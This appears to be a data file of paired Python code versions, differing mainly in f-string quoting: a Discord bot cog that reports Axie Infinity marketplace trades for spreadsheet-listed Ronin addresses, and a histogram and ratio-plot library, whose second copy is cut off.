title=f"{row["Manager"].tolist()[0]} {keyword} axie named {row["name"].tolist()[0]} for ${str(row["price"].tolist()[0])}",
description="",
url=link,
color=0x00FFFF,
)
else:
e = discord.Embed(
title=f"{row["Manager"].tolist()[0]} {keyword} axie named {row["name"].tolist()[0]}",
description="",
url=link,
color=0x00FFFF,
)
e.set_author(name="Axie Manager", icon_url=self.bot.user.avatar_url)
# Breedcount
e.add_field(
name=":eggplant:",
value=str(round(row["breedCount"].tolist()[0])),
inline=True,
)
e.add_field(name="Class", value=row["class"].tolist()[0], inline=True)
if "stats" in genes.columns:
[
e.add_field(name=stat[1:-5].capitalize(), value=stat[-2:], inline=True)
for stat in str(genes["stats"].tolist()[0])[1:-28].split(", ")
]
e.add_field(name="D", value=d, inline=True)
e.add_field(name=r1_title, value=r1, inline=True)
e.add_field(name=r2_title, value=r2, inline=True)
# Create cropped image for thumbnail
try:
img = Image.open(urlopen(row["image"].tolist()[0]))
width, height = img.size
img_cropped = img.crop((300, 220, width - 300, height - 220))
temp = BytesIO()
img_cropped.save(temp, img.format)
temp.seek(0)
file = discord.File(temp, filename="a.png")
e.set_thumbnail(url="attachment://a.png")
await channel.send(file=file, embed=e)
except Exception:
pass
await channel.send(embed=e)
async def get_genes(self, id):
"""Takes axie id and returns its genes"""
try:
response = await api_genes(id)
except Exception as e:
print(e)
print("Error fetching api_genes")
# Return an empty dataframe, so no crashes will occur
return pd.DataFrame({})
df = pd.DataFrame.from_dict(response, orient="index")
genes = df.transpose()
if genes["stage"].tolist()[0] == 1:
return pd.DataFrame({})
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
genes[part] = genes["traits"].apply(lambda x: x[part])
# Count deviations for every part
for part in ["mouth", "horn", "back", "tail"]:
genes[f"{part} r1"] = [0 if x["d"] == x["r1"] else 1 for x in genes[part]]
genes[f"{part} r2"] = [0 if x["d"] == x["r2"] else 1 for x in genes[part]]
# Sum all the deviations
genes["r1 deviation"] = (
genes["mouth r1"] + genes["horn r1"] + genes["back r1"] + genes["tail r1"]
)
genes["r2 deviation"] = (
genes["mouth r2"] + genes["horn r2"] + genes["back r2"] + genes["tail r2"]
)
return genes
async def get_addresses(self):
"""Gets all Ronin addresses in Scholars spreadsheet"""
# Open Scholars spreadsheet
sheet = gc.open("Scholars")
# Get the Scholars and Funds worksheet as dataframe
scholars = (
gd.get_as_dataframe(sheet.worksheet("Scholars"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
funds = (
gd.get_as_dataframe(sheet.worksheet("Funds"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
# We only care about these columns
scholars = scholars[["Manager", "Address"]]
funds = funds.rename(columns={"Funds Address": "Address"})
# Merge the dataframes
addresses = pd.concat([scholars, funds], ignore_index=True)
# Replace ronin: with 0x for API
addresses["Address"] = addresses["Address"].str.replace("ronin:", "0x")
return addresses
async def get_axies(self, address):
"""
Processes api results and returns the dataframe
"""
try:
df = await api_owner_axies(address)
except Exception:
return pd.DataFrame({})
# Replace parts by their part name, if there are any parts available
if "parts" in df.columns:
df["parts"] = [[d.get("name") for d in x] for x in df["parts"]]
# Save the price in dataframe
if "auction" in df.columns:
df["price"] = pd.to_numeric(
df["auction"].apply(lambda x: x["currentPriceUSD"] if x != None else x)
)
return df
def setup(bot):
bot.add_cog(Axie_trades(bot))
| ##> Imports
import math
import sys
# > 3rd party dependencies
import pandas as pd
import gspread
import gspread_dataframe as gd
from urllib.request import urlopen
from PIL import Image
from io import BytesIO
# > Discord dependencies
import discord
from discord.ext import commands
from discord.ext.tasks import loop
# > Local dependencies
from alerts.api import api_genes, api_owner_axies
from config import config
# Login using the .json file
gc = gspread.service_account(filename="authentication.json")
class Axie_trades(commands.Cog):
def __init__(self, bot):
self.bot = bot
# This serves as a database, saves: "id", "auction", "class", "breedCount", "parts", "image", "price"
self.axie_db = pd.DataFrame({})
# Start function execution
self.get_axie_auctions.start()
# Could be quicker
@loop(minutes=15)
async def get_axie_auctions(self):
"""Main function that is looped every hour"""
# Save all important data in dataframe
df = pd.DataFrame({})
# Get the address dataframe
address_df = await self.get_addresses()
addresses = address_df["Address"].tolist()
# Do this for every address in the dataframe
for address in addresses:
owned_axies = await self.get_axies(address)
owned_axies["Manager"] = address_df.loc[address_df["Address"] == address][
"Manager"
].tolist()[0]
df = pd.concat([df, owned_axies], ignore_index=True)
# If axie_ids is empty
if self.axie_db.empty:
self.axie_db = df
# Compare
else:
# Get all ids of current axies
new_ids = df["id"].tolist()
old_ids = self.axie_db["id"].tolist()
# Difference: XOR
diff = list(set(new_ids) ^ set(old_ids))
# Sold
if len(new_ids) < len(old_ids):
for id in diff:
await self.send_msg(self.axie_db, id, "sold")
# Buy
elif len(new_ids) > len(old_ids):
for id in diff:
await self.send_msg(df, id, "bought")
# No difference in ids
else:
# Check if price is not NaN
new_auctions = df.loc[~df["price"].isna()]["id"].tolist()
old_auctions = self.axie_db.loc[~self.axie_db["price"].isna()][
"id"
].tolist()
# Difference: XOR
auction_diff = list(set(new_auctions) ^ set(old_auctions))
# New listing!
if len(new_auctions) > len(old_auctions):
for id in auction_diff:
await self.send_msg(df, id, "is selling")
# Update old db
self.axie_db = df
async def send_msg(self, df, id, keyword):
"""Sends a message in the discord channel"""
# Set variables based on id and df
row = df.loc[df["id"] == id]
link = (
"https://marketplace.axieinfinity.com/axie/" + row["id"].tolist()[0] + "/"
)
# Call genes api
genes = await self.get_genes(id)
if not genes.empty:
d = ""
r1 = ""
r2 = ""
r1_title = f"R1 ({genes['r1 deviation'].tolist()[0]})"
r2_title = f"R2 ({genes['r2 deviation'].tolist()[0]})"
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
d += f"{(genes[part].tolist()[0]['d']['name'])}\n"
r1 += f"{(genes[part].tolist()[0]['r1']['name'])}\n"
r2 += f"{(genes[part].tolist()[0]['r2']['name'])}\n"
else:
d = r1 = r2 = "Unknown"
r1_title = "R1"
r2_title = "R2"
# Send message in discord channel
channel = discord.utils.get(
self.bot.get_all_channels(),
guild__name=config["DEBUG"]["GUILD_NAME"]
if len(sys.argv) > 1 and sys.argv[1] == "-test"
else config["DISCORD"]["GUILD_NAME"],
name=config["LOOPS"]["AXIE_TRADES"]["CHANNEL"],
)
# Price
if not math.isnan(row["price"].tolist()[0]):
e = discord.Embed(
title=f"{row['Manager'].tolist()[0]} {keyword} axie named {row['name'].tolist()[0]} for ${str(row['price'].tolist()[0])}",
description="",
url=link,
color=0x00FFFF,
)
else:
e = discord.Embed(
title=f"{row['Manager'].tolist()[0]} {keyword} axie named {row['name'].tolist()[0]}",
description="",
url=link,
color=0x00FFFF,
)
e.set_author(name="Axie Manager", icon_url=self.bot.user.avatar_url)
# Breedcount
e.add_field(
name=":eggplant:",
value=str(round(row["breedCount"].tolist()[0])),
inline=True,
)
e.add_field(name="Class", value=row["class"].tolist()[0], inline=True)
if "stats" in genes.columns:
[
e.add_field(name=stat[1:-5].capitalize(), value=stat[-2:], inline=True)
for stat in str(genes["stats"].tolist()[0])[1:-28].split(", ")
]
e.add_field(name="D", value=d, inline=True)
e.add_field(name=r1_title, value=r1, inline=True)
e.add_field(name=r2_title, value=r2, inline=True)
# Create cropped image for thumbnail
try:
img = Image.open(urlopen(row["image"].tolist()[0]))
width, height = img.size
img_cropped = img.crop((300, 220, width - 300, height - 220))
temp = BytesIO()
img_cropped.save(temp, img.format)
temp.seek(0)
file = discord.File(temp, filename="a.png")
e.set_thumbnail(url="attachment://a.png")
await channel.send(file=file, embed=e)
except Exception:
pass
await channel.send(embed=e)
async def get_genes(self, id):
"""Takes axie id and returns its genes"""
try:
response = await api_genes(id)
except Exception as e:
print(e)
print("Error fetching api_genes")
# Return an empty dataframe, so no crashes will occur
return pd.DataFrame({})
df = pd.DataFrame.from_dict(response, orient="index")
genes = df.transpose()
if genes["stage"].tolist()[0] == 1:
return pd.DataFrame({})
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
genes[part] = genes["traits"].apply(lambda x: x[part])
# Count deviations for every part
for part in ["mouth", "horn", "back", "tail"]:
genes[f"{part} r1"] = [0 if x["d"] == x["r1"] else 1 for x in genes[part]]
genes[f"{part} r2"] = [0 if x["d"] == x["r2"] else 1 for x in genes[part]]
# Sum all the deviations
genes["r1 deviation"] = (
genes["mouth r1"] + genes["horn r1"] + genes["back r1"] + genes["tail r1"]
)
genes["r2 deviation"] = (
genes["mouth r2"] + genes["horn r2"] + genes["back r2"] + genes["tail r2"]
)
return genes
async def get_addresses(self):
"""Gets all Ronin addresses in Scholars spreadsheet"""
# Open Scholars spreadsheet
sheet = gc.open("Scholars")
# Get the Scholars and Funds worksheet as dataframe
scholars = (
gd.get_as_dataframe(sheet.worksheet("Scholars"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
funds = (
gd.get_as_dataframe(sheet.worksheet("Funds"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
# We only care about these columns
scholars = scholars[["Manager", "Address"]]
funds = funds.rename(columns={"Funds Address": "Address"})
# Merge the dataframes
addresses = pd.concat([scholars, funds], ignore_index=True)
# Replace ronin: with 0x for API
addresses["Address"] = addresses["Address"].str.replace("ronin:", "0x")
return addresses
async def get_axies(self, address):
"""
Processes api results and returns the dataframe
"""
try:
df = await api_owner_axies(address)
except Exception:
return pd.DataFrame({})
# Replace parts by their part name, if there are any parts available
if "parts" in df.columns:
df["parts"] = [[d.get("name") for d in x] for x in df["parts"]]
# Save the price in dataframe
if "auction" in df.columns:
df["price"] = pd.to_numeric(
df["auction"].apply(lambda x: x["currentPriceUSD"] if x != None else x)
)
return df
def setup(bot):
bot.add_cog(Axie_trades(bot))
|
# Advanced histogramming & automated plotting functions
#
# (c) 2021 Mikael Mieskolainen
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
import pathlib
import matplotlib
matplotlib.use('Agg') # Important for multithreaded applications
from matplotlib import pyplot as plt
import numpy as np
import math
import copy
def chi2_cost(h_mc, h_data):
"""
Chi2 cost function between two histograms
"""
counts_mc = h_mc.counts * h_mc.binscale
err_mc = h_mc.errs * h_mc.binscale
counts_data = h_data.counts * h_data.binscale
err_data = h_data.errs * h_data.binscale
return np.sum((counts_mc - counts_data)**2 / (err_mc**2 + err_data**2))
def set_global_style(dpi=120, figsize=(4,3.75), font='serif', font_size=8, legend_fontsize=7, legend_handlelength=1):
""" Set global plot style.
"""
plt.rcParams['legend.fontsize'] = legend_fontsize
plt.rcParams['legend.handlelength'] = legend_handlelength
plt.rcParams['figure.dpi'] = dpi
plt.rcParams['figure.figsize'] = figsize
plt.rcParams['font.family'] = font
plt.rcParams['font.size'] = font_size
# Colors
imperial_dark_blue = (0, 0.24, 0.45)
imperial_light_blue = (0, 0.43, 0.69)
imperial_dark_red = (0.75, 0.10, 0.0)
imperial_green = (0.0, 0.54, 0.23)
def colors(i, power=0.34):
c = [imperial_dark_red, imperial_dark_blue, imperial_green, imperial_light_blue]
if i < len(c):
return c[i]
else:
return c[i%len(c)] * (1.0/power)
""" Global marker styles
zorder : approximate plotting order
lw : linewidth
ls : linestyle
"""
errorbar_style = {'zorder': 3, 'ls': ' ', 'lw': 1, 'marker': 'o', 'markersize': 2.5}
plot_style = {'zorder': 2, 'ls': '-', 'lw': 1}
hist_style_step = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'step'}
hist_style_fill = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'stepfilled'}
hist_style_bar = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'bar'}
class hobj:
""" Minimal histogram data object.
"""
def __init__(self, counts = 0, errs = 0, bins = 0, cbins = 0, binscale=1.0):
self.counts = counts
self.errs = errs
self.bins = bins
self.cbins = cbins
self.binscale = binscale
if (np.sum(counts) == 0):
self.is_empty = True
else:
self.is_empty = False
# + operator
def __add__(self, other):
if (self.is_empty == True): # Take the rhs
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' + operator: cannot operate on different sized histograms')
# Harmonic sum
binscale = 1/(1/self.binscale + 1/other.binscale)
counts = self.counts + other.counts
errs = np.sqrt(self.errs**2 + other.errs**2)
return hobj(counts, errs, bins, cbins, binscale)
# += operator
def __iadd__(self, other):
if (self.is_empty == True): # Still empty
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' += operator: cannot operate on different sized histograms')
self.counts = self.counts + other.counts
self.errs = np.sqrt(self.errs**2 + other.errs**2)
# Harmonic sum
self.binscale = 1/(1/self.binscale + 1/other.binscale)
return self
def stepspace(start, stop, step):
""" Linear binning edges between [start, stop]
"""
return np.arange(start, stop + step, step)
def plot_horizontal_line(ax, color=(0.5,0.5,0.5), linewidth=0.9):
""" For the ratio plot
"""
xlim = ax.get_xlim()
ax.plot(np.linspace(xlim[0], xlim[1], 2), np.array([1,1]), color=color, linewidth=linewidth)
def tick_calc(lim, step, N=6):
""" Tick spacing calculator.
"""
return [np.round(lim[0] + i*step, N) for i in range(1 + math.floor((lim[1] - lim[0])/step))]
def set_axis_ticks(ax, ticks, dim='x'):
""" Set ticks of the axis.
"""
if (dim == 'x'):
ax.set_xticks(ticks)
ax.set_xticklabels(list(map(str, ticks)))
elif (dim == 'y'):
ax.set_yticks(ticks)
ax.set_yticklabels(list(map(str, ticks)))
def tick_creator(ax, xtick_step=None, ytick_step=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, minorticks_on=True, ytick_ratio_step=0.15, labelsize=9,
labelsize_ratio=8, **kwargs) :
""" Axis tick constructor.
"""
# Get limits
xlim = ax[0].get_xlim()
ylim = ax[0].get_ylim()
# X-axis
if (xtick_step is not None):
ticks = tick_calc(lim=xlim, step=xtick_step)
set_axis_ticks(ax[-1], ticks, 'x')
# Y-axis
if (ytick_step is not None):
ticks = tick_calc(lim=ylim, step=ytick_step)
set_axis_ticks(ax[0], ticks, 'y')
# Y-ratio-axis
if ratio_plot:
ax[0].tick_params(labelbottom=False)
ax[1].tick_params(axis='y', labelsize=labelsize_ratio)
ticks = tick_calc(lim=ylim_ratio, step=ytick_ratio_step)
ticks = ticks[1:-1] # Remove the first and the last
set_axis_ticks(ax[1], ticks, 'y')
# Tick settings
for a in ax:
if minorticks_on: a.minorticks_on()
a.tick_params(top=True, bottom=True, right=True, left=True, which='both', direction='in', labelsize=labelsize)
return ax
def create_axes(xlabel='$x$', ylabel=r'Counts', ylabel_ratio='Ratio',
xlim=(0,1), ylim=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, figsize=(5,4), fontsize=9, units={'x': '', 'y': ''}, **kwargs):
""" Axes creator.
"""
# Create subplots
N = 2 if ratio_plot else 1
gridspec_kw = {'height_ratios': (3.333, 1) if ratio_plot else (1,), 'hspace': 0.0}
fig, ax = plt.subplots(N, figsize=figsize, gridspec_kw=gridspec_kw)
ax = [ax] if (N == 1) else ax
# Axes limits
for a in ax:
if xlim is not None:
a.set_xlim(*xlim)
if ylim is not None:
ax[0].set_ylim(*ylim)
# Axes labels
if kwargs['density']:
ylabel = f'$1/N$ {ylabel} / [{units['x']}]'
else:
ylabel = f'{ylabel} [{units['y']} / {units['x']}]'
xlabel = f'{xlabel} [{units['x']}]'
ax[0].set_ylabel(ylabel, fontsize=fontsize)
ax[-1].set_xlabel(xlabel, fontsize=fontsize)
# Ratio plot
if ratio_plot:
ax[1].set_ylabel(ylabel_ratio, fontsize=fontsize)
ax[1].set_ylim(*ylim_ratio)
# Setup ticks
ax = tick_creator(ax=ax, ratio_plot=ratio_plot, **kwargs)
return fig, ax
def ordered_legend(ax=None, order=None, frameon=False, unique=False, **kwargs):
""" Ordered legends.
"""
def unique_everseen(seq, key=None):
seen = set()
seen_add = seen.add
return [x for x,k in zip(seq,key) if not (k in seen or seen_add(k))]
if ax is None: ax=plt.gca()
handles, labels = ax.get_legend_handles_labels()
# Sort both labels and handles by labels
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
# Sort according to a given list, which may be incomplete
if order is not None:
keys=dict(zip(order,range(len(order))))
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t, keys=keys: keys.get(t[0],np.inf)))
# Keep only the first of each handle
if unique: labels, handles= zip(*unique_everseen(zip(labels,handles), key = labels))
ax.legend(handles, labels, frameon=frameon, **kwargs)
return (handles, labels)
def binwidth(bins):
""" Return binwidth from a linear array """
return (bins[1:] - bins[0:-1])
def edge2centerbins(bins) :
""" Get centerbins from edgebins.
"""
return (bins[1:] + bins[0:-1])/2
def ratioerr(A, B, sigma_A, sigma_B, sigma_AB = 0, EPS = 1E-15):
""" Ratio f(A,B) = A/B error, by Taylor expansion of f.
"""
A[np.abs(A) < EPS] = EPS
B[np.abs(B) < EPS] = EPS
return np.abs(A/B) * np.sqrt((sigma_A/A)**2 + (sigma_B/B)**2 - 2*sigma_AB/(A*B))
def hist_to_density(counts, errs, bins):
""" Normalize to unit integral density function over the visible histogram range """
norm = binwidth(bins) * counts.sum()
return counts/norm, errs/norm
def hist_to_density_fullspace(counts, errs, bins, totalweight):
""" Normalize histogram to a unit integral density function
over total sum of event weights (not just the visible histogram range mass)
"""
norm = binwidth(bins) * totalweight
return counts/norm, errs/norm
def hist(x, bins=30, density=False, weights=None):
""" Calculate a histogram.
"""
x = np.asarray(x, dtype=np.float64)
# Calculate histogram
if weights is None:
weights = np.ones(x.shape)
weights = np.array(weights)
counts, bins = np.histogram(x, bins=bins, weights=weights)
cbins = edge2centerbins(bins)
# Input data to histogram bins
# Weighted error on bin counts given by (square root of) sum of squared weights
inds = np.digitize(x, bins)
errs = np.asarray([np.linalg.norm(weights[inds==k],2) for k in range(1, len(bins))])
# Density integral 1 over the histogram bins range
if density:
counts, errs = hist_to_density(counts=counts, errs=errs, bins=bins)
return counts, errs, bins, cbins
def hist_obj(x, bins=30, weights=None):
""" A wrapper to return a histogram object.
"""
counts, errs, bins, cbins = hist(x, bins=bins, weights=weights)
return hobj(counts, errs, bins, cbins)
def generate_colormap():
""" Default colormap.
"""
# Take colors
color = plt.cm.Set1(np.linspace(0,1,10))
# Add black
black = np.ones((1,4))
black[:,0:3] = 0.0
color = np.concatenate((black, color))
return color
def hist_filled_error(ax, bins, cbins, y, err, color, **kwargs):
""" Stephist style error.
"""
new_args = kwargs.copy()
new_args['lw'] = 0
new_args.pop('histtype', None) # Remove
ax.fill_between(bins[0:-1], y-err, y+err, step='post', alpha=0.3, color=color, **new_args)
# The last bin
ax.fill_between(bins[-2:], (y-err)[-2:], (y+err)[-2:], step='pre', alpha=0.3, color=color, **new_args)
def superplot(data, observable=None, ratio_plot=True, yscale='linear', ratio_error_plot=True, \
legend_counts=False, color=None, legend_properties={'fontsize': 9}, bottom_PRC=5, EPS=1E-12):
""" Superposition (overlaid) plotting
"""
if observable == None:
observable = data[0]['obs']
fig, ax = create_axes(**observable, ratio_plot=ratio_plot)
if color == None:
color = generate_colormap()
legend_labels = []
# y-axis limit
bottom_count = 1e32
ceiling_count = 0
# Plot histograms
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i}')
continue
c = data[i]['color']
if c is None: c = color[i]
counts = data[i]['hdata'].counts * data[i]['hdata'].binscale
errs = data[i]['hdata'].errs * data[i]['hdata'].binscale
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# -----------------------------------------------
# ** For visualization autolimits **
# Use percentile for the bottom (~ handle noisy small bins)
bottom_count = np.min([bottom_count, np.percentile(counts[counts > EPS], bottom_PRC)])
ceiling_count = np.max([ceiling_count, np.max(counts[counts > 0])])
# -----------------------------------------------
label = data[i]['label']
if legend_counts == True:
label += f' $N={np.sum(data[i]['hdata'].counts):.1f}$'
legend_labels.append(label)
if data[i]['hfunc'] == 'hist' :
ax[0].hist(x=cbins, bins=bins, weights=counts, color=c, label=label, **data[i]['style'])
hist_filled_error(ax=ax[0], bins=bins, cbins=cbins, y=counts, err=errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar' :
ax[0].errorbar(x=cbins, y=counts, yerr=errs, color=c, label=label, **data[i]['style'])
elif data[i]['hfunc'] == 'plot' :
ax[0].plot(cbins, counts, color=c, label=label, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[0].fill_between(cbins, counts-errs, counts+errs, alpha=0.3, color=c, **new_args)
# Plot ratiohistograms
if ratio_plot:
plot_horizontal_line(ax[1])
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i} (ratioplot)')
continue
c = data[i]['color']
if c is None: c = color[i]
A = data[i]['hdata'].counts * data[i]['hdata'].binscale
B = data[0]['hdata'].counts * data[0]['hdata'].binscale
sigma_A = data[i]['hdata'].errs * data[i]['hdata'].binscale
sigma_B = data[0]['hdata'].errs * data[0]['hdata'].binscale
sigma_AB = 0
ratio_errs = ratioerr(A=A, B=B, sigma_A=sigma_A, sigma_B=sigma_B, sigma_AB=sigma_AB)
EPS = 1E-30
ratio = A / (B + EPS)
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# If no errors turned on
if ratio_error_plot == False:
ratio_errs = np.zeros(ratio_errs.shape)
if data[i]['hfunc'] == 'hist':
ax[1].hist(x=cbins, bins=bins, weights=ratio, color=c, **data[i]['style'])
hist_filled_error(ax=ax[1], bins=bins, cbins=cbins, y=ratio, err=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar':
ax[1].errorbar(x=cbins, y=ratio, yerr=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'plot':
ax[1].plot(cbins, ratio, color=c, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[1].fill_between(cbins, ratio-ratio_errs, ratio+ratio_errs, alpha=0.3, color=c, **new_args)
# Legend
if legend_labels != []:
ordered_legend(ax = ax[0], order=legend_labels, **legend_properties)
# --------------------------------------------------------------------
# Upper figure
# Log y-scale
ax[0].set_yscale(yscale)
# y-limits
if observable['ylim'] is None:
ylim_now = ax[0].get_ylim()
if yscale == 'log':
ax[0].set_ylim([bottom_count / 4, ceiling_count * 10])
else:
ax[0].set_ylim([0, ceiling_count * 1.5])
else:
ax[0].set_ylim(observables.ylim)
# --------------------------------------------------------------------
return fig, ax
def change2density_labels(all_obs):
""" Change to density ~ 1/N dN/dx [1/xdim] type label to y-axis """
for key in all_obs.keys():
xlabel = all_obs[key]['xlabel'].replace('$', '')
all_obs[key]['ylabel'] = '$\\frac{1}{N} \\; ' + f'dN/d{xlabel}$'
all_obs[key]['units']['y'] = '1'
return all_obs
def histmc(mcdata, all_obs, density=False, scale=None, color=(0,0,1), label='none', style=hist_style_step):
""" Over all observables of an MC sample """
obj = {}
for OBS in all_obs.keys():
# Histogram it
counts, errs, bins, cbins = hist(x=mcdata['data'][OBS], bins=all_obs[OBS]['bins'], weights=mcdata['weights'])
# Compute differential cross section within histogram range
# Note that division by sum(weights) handles the histogram range integral (overflow) properly
binscale = mcdata['xsection_pb'] / binwidth(bins) / np.sum(mcdata['weights'])
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
counts,errs = hist_to_density(counts=counts, errs=errs, bins=bins)
binscale = 1.0
obj[OBS] = {'hdata': hobj(counts, errs, bins, cbins, binscale), 'hfunc' : 'hist', 'color': color, 'label': label, 'style' : style}
return obj
def histhepdata(hepdata, all_obs, scale=None, density=False, MC_XS_SCALE=1E12, label='Data', style=hist_style_step):
# Over all observables
obj = {}
for OBS in all_obs.keys():
# Over all DATA files (now fixed to one)
data_obj = []
y = hepdata[OBS]['y']
yerr = hepdata[OBS]['y_err']
bins = hepdata[OBS]['bins']
cbins = hepdata[OBS]['x']
binscale = hepdata[OBS]['scale'] * MC_XS_SCALE
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
norm = hepdata[OBS]['binwidth'] * y.sum()
y /= norm
yerr /= norm
binscale = 1.0
obj[OBS] = {'hdata': hobj(y, yerr, bins, cbins, binscale), 'hfunc' : 'hist', 'color': (0,0,0), 'label': label, 'style' : style}
return obj
def fuse_histograms(hist_list):
"""
Fuse a list of count histogram objects
"""
hsum = copy.deepcopy(hist_list[0])
for c in range(1, len(hist_list)):
for OBS in hist_list[0].keys():
hsum[OBS]['hdata'] += hist_list[c][OBS]['hdata']
return hsum
def test_iceplot():
""" Visual unit tests """
import pytest
import pathlib
pathlib.Path("./testfigs").mkdir(parents=True, exist_ok=True)
# ------------------------------------------------------------------------
set_global_style()
# Synthetic input data
r1 = np.random.randn(25000) * 0.8
r2 = np.random.randn(25000) * 1
r3 = np.random.randn(25000) * 1.2
r4 = np.random.randn(25000) * 1.5
# ------------------------------------------------------------------------
# Mathematical definitions
# Momentum squared
def pt2(x):
return np.power(x,2);
# ------------------------------------------------------------------------
# Observables containers
obs_pt2 = {
# Axis limits
'xlim' : (0, 1.5),
'ylim' : None,
'xlabel' : r'$p_t^2$',
'ylabel' : r'Counts',
'units' : {'x': r'GeV$^2$', 'y' : r'counts'},
'label' : r'Transverse momentum squared',
'figsize' : (4, 3.75),
# Ratio
'ylim_ratio' : (0.7, 1.3),
# Histogramming
'bins' : np.linspace(0, 1.5, 60),
'density' : False,
# Function to calculate
'func' : pt2
}
# ------------------------------------------------------------------------
# ** Example **
fig1, ax1 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax1[0].errorbar(x=cbins, y=counts, yerr=errs, color=(0,0,0), label='Data $\\alpha$', **errorbar_style)
ax1[0].legend(frameon=False)
fig1.savefig('./testfigs/testplot_1.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig2, ax2 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax2[0].hist(x=cbins, bins=bins, weights=counts, color=(0.5, 0.2, 0.1), label='Data $\\alpha$', **hist_style_step)
ax2[0].legend(frameon=False)
fig2.savefig('./testfigs/testplot_2.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig3, ax3 = create_axes(**obs_pt2, ratio_plot=True)
counts1, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts1, color=(0,0,0), label='Data 1', **hist_style_step)
counts2, errs, bins, cbins = hist(obs_pt2['func'](r2), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts2, color=(1,0,0), alpha=0.5, label='Data 2', **hist_style_step)
ordered_legend(ax = ax3[0], order=['Data 1', 'Data 2'])
# Ratio
plot_horizontal_line(ax3[1])
ax3[1].hist(x=cbins, bins=bins, weights=counts2 / (counts1 + 1E-30), color=(1,0,0), alpha=0.5, label='Data $\\beta$', **hist_style_step)
fig3.savefig('./testfigs/testplot_3.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
data_template = {
'data' : None,
'weights': None,
'label' : 'Data',
'hfunc' : 'errorbar',
'style' : errorbar_style,
'obs' : obs_pt2,
'hdata' : None,
'color' : None
}
# Data source <-> Observable collections
data1 = data_template.copy() # Deep copies
data2 = data_template.copy()
data3 = data_template.copy()
data4 = data_template.copy()
data1.update({
'data' : r1,
'label' : 'Data $\\alpha$',
'hfunc' : 'errorbar',
'style' : errorbar_style,
})
data2.update({
'data' : r2,
'label' : 'Data $\\beta$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data3.update({
'data' : r3,
'label' : 'Data $\\gamma$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data4.update({
'data' : r4,
'label' : 'Data $\\delta$',
'hfunc' : 'plot',
'style' : plot_style,
})
data = [data1, data2, data3, data4]
# Calculate histograms
for i in range(len(data)):
data[i]['hdata'] = hist_obj(data[i]['obs']['func'](data[i]['data']), bins=data[i]['obs']['bins'])
# Plot it
fig4, ax4 = superplot(data, ratio_plot=True, yscale='log')
fig5, ax5 = superplot(data, ratio_plot=True, yscale='linear', ratio_error_plot=False)
fig4.savefig('./testfigs/testplot_4.pdf', bbox_inches='tight')
fig5.savefig('./testfigs/testplot_5.pdf', bbox_inches='tight')
| # Advanced histogramming & automated plotting functions
#
# (c) 2021 Mikael Mieskolainen
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
import pathlib
import matplotlib
matplotlib.use('Agg') # Important for multithreaded applications
from matplotlib import pyplot as plt
import numpy as np
import math
import copy
def chi2_cost(h_mc, h_data):
"""
Chi2 cost function between two histograms
"""
counts_mc = h_mc.counts * h_mc.binscale
err_mc = h_mc.errs * h_mc.binscale
counts_data = h_data.counts * h_data.binscale
err_data = h_data.errs * h_data.binscale
return np.sum((counts_mc - counts_data)**2 / (err_mc**2 + err_data**2))
def set_global_style(dpi=120, figsize=(4,3.75), font='serif', font_size=8, legend_fontsize=7, legend_handlelength=1):
""" Set global plot style.
"""
plt.rcParams['legend.fontsize'] = legend_fontsize
plt.rcParams['legend.handlelength'] = legend_handlelength
plt.rcParams['figure.dpi'] = dpi
plt.rcParams['figure.figsize'] = figsize
plt.rcParams['font.family'] = font
plt.rcParams['font.size'] = font_size
# Colors
imperial_dark_blue = (0, 0.24, 0.45)
imperial_light_blue = (0, 0.43, 0.69)
imperial_dark_red = (0.75, 0.10, 0.0)
imperial_green = (0.0, 0.54, 0.23)
def colors(i, power=0.34):
c = [imperial_dark_red, imperial_dark_blue, imperial_green, imperial_light_blue]
if i < len(c):
return c[i]
else:
return c[i%len(c)] * (1.0/power)
""" Global marker styles
